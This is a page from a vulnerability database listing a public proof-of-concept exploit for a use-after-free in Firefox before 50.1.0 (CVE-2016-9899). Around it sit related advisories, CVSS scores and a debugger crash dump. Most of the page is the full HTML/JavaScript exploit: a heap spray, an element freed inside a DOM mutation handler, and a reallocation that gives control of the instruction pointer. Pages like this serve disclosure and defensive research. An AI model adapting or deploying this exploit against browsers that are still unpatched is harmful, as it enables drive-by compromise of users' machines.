Vulners
Lucene search
Mozilla Firefox < 50.1.0 - Use-After-Free
| Reporter | Title | Published | Views | Family All 140 |
|---|---|---|---|---|
 | Mozilla Firefox 50.1.0 - Use After Free Exploit | 14 Jan 201700:00 | – | zdt |
 | mozilla -- multiple vulnerabilities | 13 Dec 201600:00 | – | freebsd |
 | Security Bulletin: Mozilla Firefox vulnerability issues in IBM SONAS | 18 Jun 201800:32 | – | ibm |
| Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified. | 18 Jun 201800:32 | – | ibm |
 | Mozilla Firefox < 50.1 Multiple Vulnerabilities | 5 Jan 201700:00 | – | nessus |
| Mozilla Firefox ESR < 45.6 Multiple Vulnerabilities | 5 Jan 201700:00 | – | nessus |
| CentOS 5 / 6 / 7 : firefox (CESA-2016:2946) | 20 Dec 201600:00 | – | nessus |
| CentOS 5 / 6 / 7 : thunderbird (CESA-2016:2973) | 21 Dec 201600:00 | – | nessus |
| Debian DLA-743-1 : firefox-esr security update | 16 Dec 201600:00 | – | nessus |
| Debian DLA-782-1 : icedove security update | 16 Jan 201700:00 | – | nessus |
10
<!DOCTYPE html>
<html>
<head>
<!-- <meta http-equiv="refresh" content="1"/> -->
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="0" />
<meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
<meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
<meta http-equiv="Pragma" content="no-cache" />
<style type="text/css">
body{
background-color:lime;
font-color:red;
};
</style>
<script type='text/javascript'></script>
<script type="text/javascript" language="JavaScript">
/*
* Mozilla Firefox < 50.1.0 Use-After-Free POC
* Author: Marcin Ressel
* Date: 13.01.2017
* Vendor Homepage: www.mozilla.org
* Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
* Version: < 50.1.0
* Tested on: Windows 7 (x64) Firefox 32 && 64 bit
* CVE: CVE-2016-9899
*************************************************
* (b1c.5e0): Access violation - code c0000005 (first chance)
* First chance exceptions are reported before any exception handling.
* This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
* eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
* eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc
* cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
* xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
* 6d7cc44c ff12 call dword ptr [edx] ds:002b:4543484f=????????
* 0:000> dd eax
* 0f804c00 4543484f 91919191 91919191 91919191
* 0f804c10 91919191 91919191 91919191 91919191
* 0f804c20 91919191 91919191 91919191 91919191
* 0f804c30 91919191 91919191 91919191 91919191
* 0f804c40 91919191 91919191 91919191 91919191
* 0f804c50 91919191 91919191 91919191 91919191
* 0f804c60 91919191 91919191 91919191 91919191
* 0f804c70 91919191 91919191 91919191 91919191
*
*/
var doc = null;
var cnt = 0;
function m(blocks,size) {
var arr = [];
for(var i=0;i<blocks;i++) {
arr[i] = new Array(size);
for(var j=0;j<size;j+=2) {
arr[i][j] = 0x41414141;
arr[i][j+1] = 0x42424242;
}
}
return arr;
}
function handler() { //free
if(cnt > 0) return;
doc.body.appendChild(document.createElement("audio")).remove();
m(1024,1024);
++cnt;
}
function trigger() {
if(cnt > 0) {
var pl = new Array();
doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false);
for(var i=0;i<4096;i++) { //replace
pl[i]=new Uint8Array(1000);
pl[i][0] = 0x4F;
pl[i][1] = 0x48;
pl[i][2] = 0x43;
pl[i][3] = 0x45; //eip
for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91;
// pl[i] = document.createElement('media');
//document.body.appendChild(pl[i]);
}
window.pl = pl
document.getElementById("t1").remove(); //re-use
}
}
function testcase()
{
var df = m(4096,1000);
document.body.setAttribute('df',df);
doc = document.getElementById("t1").contentWindow.document;
doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false);
doc.getElementsByTagName("*")[0].style = "ANNNY";
setInterval("trigger();",1000);
}
</script>
<title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
</head>
<body onload='testcase();'>
<iframe src='about:blank' id='t1' width="100%"></iframe>
</body>
</html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2017 00:00Current
9.8High risk
Vulners AI Score9.8
CVSS 27.5
CVSS 39.8
EPSS0.36421